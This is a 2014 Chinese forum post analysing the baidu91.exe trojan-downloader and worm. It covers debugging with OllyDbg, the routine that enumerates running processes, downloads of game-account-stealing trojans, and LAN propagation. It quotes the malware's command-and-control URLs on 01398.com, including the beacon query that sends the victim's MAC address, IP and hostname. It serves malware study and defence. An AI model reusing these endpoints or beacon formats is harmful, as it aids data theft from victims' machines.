本帖最后由 战争贩子 于 2014-9-15 18:05 编辑
baidu91.exe 病毒行为分析
分析人:52pojie 战争贩子 病毒信息名称:baidu91.exe 会下载若干木马文件文件名不一 大小:36 kb 文件类型: PE 文件未加壳 病毒类型:Trojan-Downloader Trojan.Worm 360查杀:未发现木马 文件CRC:0x5D9C690B 概述 该文件执行后会通过网络获取加密策略,并且通过该策略对指定进程进行遍历,如果发现该进程(游戏),就从指定服务器下载该进程(游戏)的木马文件并且执行。最后发送该主机的相关信息到指定的服务器的页面接口上。 详细分析利用OD工具载入该程序,在send与recv处下断点,发现该程序有一下封包的交互行为
(图1)
图1为程序执行之后发送的第一个请求封包。此链接的地址为:http://t.01398.com:5876/c.txt?t=1410761014&mac=080027F168EE&flag=baidu91&name=LIQUAN-FE29EC1&ver=4&os=51&hash=18e98f6603f4970170b878ff6f1bc848
(图2)
图2为第一次接收的封包,可见接收到的封包为多行字符串,意义就是某种策略。
(图3)
图3:直接运行连接的结果
继续执行代码,走出recv,下断点在程序偏移 0x1D3D处,发现ebp-0x2C变量的所指向的内容为。如图
(图4)
程序紧接着进入偏移0xB30处函数中,发现函数的调用顺序为先执行了CreateToolHelp32,紧接着调用了Process32First然后进入循环形成遍历链,条件为Process32Next返回值是否为NULL,这是个经典的遍历进程的代码。走出此函数发现,如果进程不存在则调走,如果进程存在执行下载者。如图遍历函数内容。见(图5)
(图5)
详细介绍下如果存在该进程的处理方式,如果通过修改内存使这个函数的判断为真(既存在这个进程)执行不跳转的那段代码,返现系统开始进行下载而且不同的进程下载的木马是不同的。比如说:DNF.exe下载的是一个DNF图标的进程,我分析之后发现是盗号木马。而svchost.exe(此进程一般存在)发现下载的是个驱动。见如下图DNF的下载进程情况。
(图6-图9)
最后无论是什么进程,程序均会往一个六合网站上发用户的主机信息等等。http://s1.01398.com:5898/r.ashx?t=1410761143&mac=080027F168EE&flag=baidu91&ip=192.168.1.106&name=LIQUAN-FE29EC1&run=init&ver=4&os=51&state=0&hash=dc65c382fa1ae3a0ed487e1398061c3f此为链接地址。
图10:程序出现蠕虫病毒的现象,像全局域网的系统开始发起入侵。
(图10) (图11)
程序下载了近20多种木马,危害严重。
总结
程序为一款多功能下载者及蠕虫病毒,可以盗取游戏账号,偷取游戏装备,提升黑客在系统的权限,并且网局域网其他机器发动远程攻击(攻击模式未知,按笔者主机的情况应该是某种缓冲区溢出攻击)
| 
[复制链接]
发表于 2014-9-15 17:31
|
发表于 2014-9-15 17:36
